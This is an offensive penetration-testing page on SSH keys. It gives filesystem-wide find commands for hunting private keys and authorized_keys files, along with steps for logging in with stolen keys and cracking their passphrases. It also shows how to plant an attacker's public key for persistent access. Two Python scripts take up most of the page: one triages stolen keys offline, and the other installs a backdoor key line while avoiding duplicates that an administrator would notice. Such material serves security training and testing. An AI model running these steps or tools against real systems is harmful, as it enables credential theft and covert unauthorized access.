# SSH Keys

## What is an SSH Keypair?

When we generate an SSH key with `ssh-keygen`, we are actually generating a public/private key pair. Older OpenSSH releases default to RSA; current releases (OpenSSH 9.5 and later) default to Ed25519, so the file names depend on the key type:

* **Public key**: `id_rsa.pub` (or `id_ed25519.pub`)
* **Private key**: `id_rsa` (or `id_ed25519`)

SSH without a password works when the public key is listed in the target user's `~/.ssh/authorized_keys` on the server and the client presents the matching private key.

## Enumeration

Search for SSH private keys. The default file names are `id_rsa`, `id_ed25519`, `id_ecdsa` and `id_dsa`, but a key can be stored under any name (deploy keys, backups, CI config), so it is also worth grepping readable files for the `PRIVATE KEY-----` header:

```bash
find / \( -name id_rsa -o -name id_ed25519 -o -name id_ecdsa -o -name id_dsa \) 2>/dev/null
```

Search for `authorized_keys` (the list of public keys allowed to log in as that account without a password; its location tells you which users accept key authentication, and the comment field of each entry often names the owning host or user):

```bash
find / -name authorized_keys 2>/dev/null
```

## SSH without Password

Once we obtain an SSH private key from the victim machine, we can try to SSH in with it instead of a password. Note that the matching public key must be present in the target account's `authorized_keys`; if it is not, the key may still be valid for another user or host (the public key's comment and any nearby `~/.ssh/config` or `known_hosts` entries are good hints). If the private key is passphrase-protected, `ssh` will prompt for the passphrase; the passphrase can be attacked offline with `ssh2john` and John the Ripper.

Give the private key restrictive permissions, otherwise `ssh` refuses it with "Permissions ... are too open" and ignores the key:

```bash
chmod 600 id_rsa
```

SSH in:

```bash
ssh -i id_rsa <username>@<remote_ip>
```
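Before trying every key against every host, it helps to know what each found key is, whether it needs a passphrase, and which `authorized_keys` entries it unlocks. The script below is an added example (not part of the original page) that does that triage offline: it parses the `openssh-key-v1` container directly, as documented in OpenSSH's `PROTOCOL.key`, so it needs neither `ssh-keygen` nor a crypto library on the victim. The cipher name in the header tells whether a passphrase is required, and the public key blob stored in the header is the same bytes that appear base64-encoded in `.pub` files and `authorized_keys`, so matching is a string comparison. Legacy PEM keys (`BEGIN RSA PRIVATE KEY`) are only classified, since recovering their public key needs real arithmetic. The sample keys and `authorized_keys` lines are constructed inline with dummy key material and are not real keys.

```python
"""Offline triage of SSH private keys found during enumeration (added example)."""
import base64
import hashlib
import struct

MAGIC = b"openssh-key-v1\x00"
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")


def _string(b):
    """Encode bytes as an SSH wire string (uint32 length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    """Decode one SSH wire string at offset; return (data, new_offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def fingerprint(pub_blob):
    """SHA256 fingerprint as 'ssh-keygen -lf' prints it (unpadded base64)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(pub_blob).digest()).decode().rstrip("=")


def parse_private_key(text):
    """Describe a private key file without decrypting anything."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(ln for ln in lines[1:] if not ln.startswith("-----")))
        if not raw.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 container")
        off = len(MAGIC)
        cipher, off = _read_string(raw, off)    # b"none" when unencrypted
        kdf, off = _read_string(raw, off)       # b"bcrypt" when passphrase-protected
        _kdfopts, off = _read_string(raw, off)
        off += 4                                # uint32 number of keys
        pub_blob, off = _read_string(raw, off)  # identical to the .pub / authorized_keys blob
        keytype, _ = _read_string(pub_blob, 0)
        return {"format": "openssh-key-v1", "type": keytype.decode(),
                "encrypted": cipher != b"none", "kdf": kdf.decode(),
                "fingerprint": fingerprint(pub_blob),
                "pub_b64": base64.b64encode(pub_blob).decode()}
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        # Legacy PEM: encryption is flagged by a Proc-Type header. Only classify it.
        kind = header[len("-----BEGIN "):-len(" PRIVATE KEY-----")]
        encrypted = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)
        return {"format": "pem", "type": kind, "encrypted": encrypted,
                "kdf": None, "fingerprint": None, "pub_b64": None}
    raise ValueError("unrecognised key header: " + header)


def parse_authorized_keys(text):
    """Return one dict per entry; options such as command="..." may precede the key."""
    entries = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue
        entries.append({"options": " ".join(tokens[:idx]), "type": tokens[idx],
                        "pub_b64": tokens[idx + 1], "comment": " ".join(tokens[idx + 2:])})
    return entries


def triage(private_keys, authorized_text):
    """private_keys: {path: file text}. Returns a report dict per key with its matches."""
    by_blob = {}
    for e in parse_authorized_keys(authorized_text):
        by_blob.setdefault(e["pub_b64"], []).append(e)
    reports = []
    for path, text in private_keys.items():
        info = parse_private_key(text)
        info["path"] = path
        info["matches"] = by_blob.get(info["pub_b64"], []) if info["pub_b64"] else []
        reports.append(info)
    return reports


def build_ed25519_key(pub32, priv64, comment, cipher=b"none", kdf=b"none", kdfopts=b""):
    """Assemble an openssh-key-v1 file. Used only to construct sample input here;
    the key bytes are dummies, not a real keypair."""
    pub_blob = _string(b"ssh-ed25519") + _string(pub32)
    priv = struct.pack(">II", 0xC0FFEE, 0xC0FFEE)  # checkint, repeated
    priv += _string(b"ssh-ed25519") + _string(pub32) + _string(priv64) + _string(comment)
    if len(priv) % 8:
        priv += bytes(range(1, 8 - len(priv) % 8 + 1))  # pad 1,2,3,... to the block size
    raw = (MAGIC + _string(cipher) + _string(kdf) + _string(kdfopts)
           + struct.pack(">I", 1) + _string(pub_blob) + _string(priv))
    b64 = base64.b64encode(raw).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed samples (dummy key material, not real keys).
_PUB_DEV, _PUB_DEPLOY = bytes(range(32)), bytes(32)
SAMPLE_PRIVATE_KEYS = {
    "/home/dev/.ssh/id_ed25519": build_ed25519_key(_PUB_DEV, bytes(64), b"dev@workstation"),
    "/opt/app/deploy_key": build_ed25519_key(_PUB_DEPLOY, bytes(64), b"deploy",
                                             cipher=b"aes256-ctr", kdf=b"bcrypt", kdfopts=b"\x00" * 20),
    "/var/backups/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                           "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                           "AAAA\n-----END RSA PRIVATE KEY-----\n",
}
SAMPLE_AUTHORIZED_KEYS = (
    "# keys accepted for this account\n"
    "ssh-ed25519 " + base64.b64encode(_string(b"ssh-ed25519") + _string(_PUB_DEV)).decode()
    + " dev@workstation\n"
    'command="/usr/local/bin/backup.sh",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC dummy\n'
)

if __name__ == "__main__":
    for r in triage(SAMPLE_PRIVATE_KEYS, SAMPLE_AUTHORIZED_KEYS):
        print(r["path"], r["type"], "encrypted" if r["encrypted"] else "plain",
              r["fingerprint"], [m["comment"] for m in r["matches"]])
```

The `matches` list is what decides the next step: a plain key that matches an entry is ready to use with `ssh -i`; an entry carrying `command=` or `no-pty` options will give a restricted session rather than a shell; an encrypted key (`kdf` of `bcrypt`) needs its passphrase first.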

## ~/.ssh/authorized_keys

If `~/.ssh/authorized_keys` is writable on the victim machine (or `~/.ssh` is writable, so the file can be created), we can generate an SSH keypair on the attack machine and add the generated public key to this file. This allows us to SSH into the victim machine as that user with the generated private key, without knowing the account's password. Permissions matter: with the default `StrictModes yes`, `sshd` silently ignores an `authorized_keys` file (or `~/.ssh` directory) that is group- or world-writable or not owned by the user, so keep the directory at mode 700 and the file at mode 600.

Generate an SSH keypair on the attack machine (`-t ed25519` picks a modern key type; `-N ""` sets an empty passphrase so the key can be used non-interactively):

```bash
ssh-keygen -t ed25519 -f mykey -N ""
```

Add the contents of `mykey.pub` to `~/.ssh/authorized_keys` on the victim machine (paste the whole single line, including the `ssh-ed25519` prefix and the comment, and make sure the existing file ends with a newline before appending):

```bash
echo "<contents of mykey.pub>" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
```

Give the private key restrictive permissions:

```bash
chmod 600 mykey
```

SSH in:

```bash
ssh -i mykey <username>@<remote_ip>
```
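The steps above collapse into one function once the permission rules are taken into account. The following is an added example (not from the original page) that installs a public key line into a target home directory the way `sshd` wants to see it: `~/.ssh` created at 0700, `authorized_keys` at 0600, the entry appended only if the same key blob is not already present, and a missing trailing newline in the existing file handled so the new line does not fuse with the previous one. `check_permissions` mirrors the writability part of the `StrictModes` check (it does not check ownership). `demo()` exercises it in a scratch directory with a constructed, dummy key line.

```python
"""Install a public key into ~/.ssh/authorized_keys with StrictModes-safe permissions (added example)."""
import os
import stat
import tempfile


def _key_blob(line):
    """Base64 blob of an authorized_keys line (ignores options and comment); None for blank/comment lines."""
    tokens = line.split()
    if not tokens or tokens[0].startswith("#"):
        return None
    for i, t in enumerate(tokens):
        if t.startswith(("ssh-", "ecdsa-sha2-", "sk-")) and i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def install_authorized_key(home, pubkey_line):
    """Append pubkey_line to <home>/.ssh/authorized_keys.
    Returns True if added, False if that key blob was already present."""
    new_blob = _key_blob(pubkey_line)
    if new_blob is None:
        raise ValueError("not a valid public key line")
    ssh_dir = os.path.join(home, ".ssh")
    path = os.path.join(ssh_dir, "authorized_keys")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # makedirs applies the umask and skips existing dirs; force the mode
    existing = ""
    if os.path.exists(path):
        with open(path) as fh:
            existing = fh.read()
    added = not any(_key_blob(ln) == new_blob for ln in existing.splitlines())
    if added:
        with open(path, "a") as fh:
            if existing and not existing.endswith("\n"):
                fh.write("\n")  # otherwise the new entry would glue onto the last line
            fh.write(pubkey_line.strip() + "\n")
    os.chmod(path, 0o600)
    return added


def check_permissions(home):
    """Report paths sshd's StrictModes would reject for being group/world-writable."""
    problems = []
    ssh_dir = os.path.join(home, ".ssh")
    for p in (home, ssh_dir, os.path.join(ssh_dir, "authorized_keys")):
        if not os.path.exists(p):
            problems.append(p + " missing")
        elif os.stat(p).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(p + " is group/world writable")
    return problems


def demo():
    """Run the install twice against a scratch home directory and return what happened."""
    home = tempfile.mkdtemp()
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir)
    with open(os.path.join(ssh_dir, "authorized_keys"), "w") as fh:
        fh.write("# existing entries")  # deliberately no trailing newline
    # Constructed sample line: dummy blob, not a real key.
    blob = "AAAAC3NzaC1lZDI1NTE5AAAAIDummyDummyDummyDummyDummyDummyDummyDummyDum"
    first = install_authorized_key(home, "ssh-ed25519 " + blob + " attacker@kali")
    second = install_authorized_key(home, "ssh-ed25519 " + blob + " same-key-other-comment")
    path = os.path.join(ssh_dir, "authorized_keys")
    with open(path) as fh:
        lines = fh.read().splitlines()
    return {"first": first, "second": second, "lines": lines,
            "dir_mode": stat.S_IMODE(os.stat(ssh_dir).st_mode),
            "file_mode": stat.S_IMODE(os.stat(path).st_mode),
            "problems": check_permissions(home)}


if __name__ == "__main__":
    print(demo())
```

Deduplicating on the key blob rather than the whole line matters because the comment is free text: the same key pasted twice with different comments still counts once, and a second copy of an entry is a noisy artifact that an administrator reviewing the file will notice.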
